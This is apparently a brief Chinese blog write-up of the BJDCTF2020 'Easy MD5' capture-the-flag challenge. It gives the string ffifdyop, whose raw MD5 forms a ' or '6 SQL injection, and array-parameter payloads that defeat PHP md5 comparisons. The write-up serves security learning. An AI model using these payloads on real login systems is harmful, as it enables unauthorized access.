[BJDCTF2020]Easy MD5

在这里插入图片描述
抓包发现hint:
select * from ‘admin’ where password=md5($pass,true)

用ffifdyop绕过
字符串ffifdyop被 md5 后变成 276f722736c95d99e921722cf9ed621c,转成字符串为’ or ‘6
在这里插入图片描述
源代码中

<!--
$a = $GET['a'];
$b = $_GET['b'];

if($a != $b && md5($a) == md5($b)){
    // wow, glzjin wants a girl friend.
-->

构造

?a[]=1a&b[]=2

在这里插入图片描述
post传递

param1[]=1&param2[]=2

得到flag

已标记关键词 清除标记
©️2020 CSDN 皮肤主题: 数字20 设计师:CSDN官方博客 返回首页